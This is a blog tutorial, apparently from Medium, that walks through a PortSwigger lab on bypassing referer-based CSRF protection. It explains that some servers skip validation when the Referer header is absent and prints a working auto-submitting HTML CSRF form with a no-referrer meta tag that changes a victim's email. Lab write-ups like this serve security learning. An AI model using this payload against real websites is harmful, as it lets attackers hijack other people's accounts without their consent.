Hey Guys Welcome to my blog so today we are going to discuss about the bypassing technique of CSRF referer-based defense

Checking the referer header protects against CSRF because these headers help servers filter out requests that have originated from foreign sites. Confirming a CSRF vulnerability like this can help you rule out endpoints that have referer-based CSRF protection. However, developers need to remember that referer headers can be manipulated by attackers and aren’t a foolproof mitigation solution.

Developers should implement a combination of CSRF tokens and SameSite session cookies for the best protection.

If don’t what is CSRF Just check out the below article

https://evilox.medium.com/explanation-of-csrf-cross-site-request-forgery-bc6a5042bcbf

https://evilox.medium.com/unmasking-basic-csrf-bug-hunter-5003dbe44466

https://evilox.medium.com/hacking-csrf-bypassing-of-csrf-token-f03b51c36d31

What is a referer?

Referer is the HTTP header which you can able to see in the HTTP request

When a user clicks on a link or submits a form on a website, their browser typically includes the Referer header in the subsequent request to provide information about the referrer page. This can be useful for websites to track the origin of traffic or for navigation purposes.

Let’s see the below image

If I change the header URL it throws the 400 Bad Request

Now let’s see this bypassing technique for referer-based header so here I have used the portswigger lab to explain this technique

Removing the referer header from the request

The first technique is to remove the referer header from the request because sometimes if the referer header is not available it does not valid the header

Lab: CSRF where Referer validation depends on header being present

In this lab, there is an email update functionality that updates the email with referer header validation

Here We going to remove the referer header because some of the applications skip the validation if the header is not available

STEP 1: Log in with the default Username and Password

STEP 2: Update the EMail ID and capture that request burp

STEP 3: Send to the repeater and remove the referer header

Now you can able to see the 302 response so it working

Let’s regenerate the CSRF POC using burpsuite pro or you can do it manually using the below article

https://evilox.medium.com/unmasking-basic-csrf-bug-hunter-5003dbe44466

STEP 4: Add the meta tag in that CSRF Poc Draft

<meta name="referrer" content="no-referrer">

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a3000a003413c8d81a4393d003d00d6.web-security-academy.net/my-account/change-email" method="POST">
     <meta name="referrer" content="no-referrer">
      <input type="hidden" name="email" value="hacked&#64;gmail&#46;htb" />
      <input type="submit" value="Submit request" />
     <script>
            document.forms[0].submit();
        </script>
    </form>
  </body>
</html>

STEP 5: Now store that in the exploit server and deliver it to the victim

Now the lab get solved

Summary

While testing the application for CSRF if see the referer header as validation just remove it and send it with the meta tag of no referer

I hope you will understand this article If you like this please give applause to this article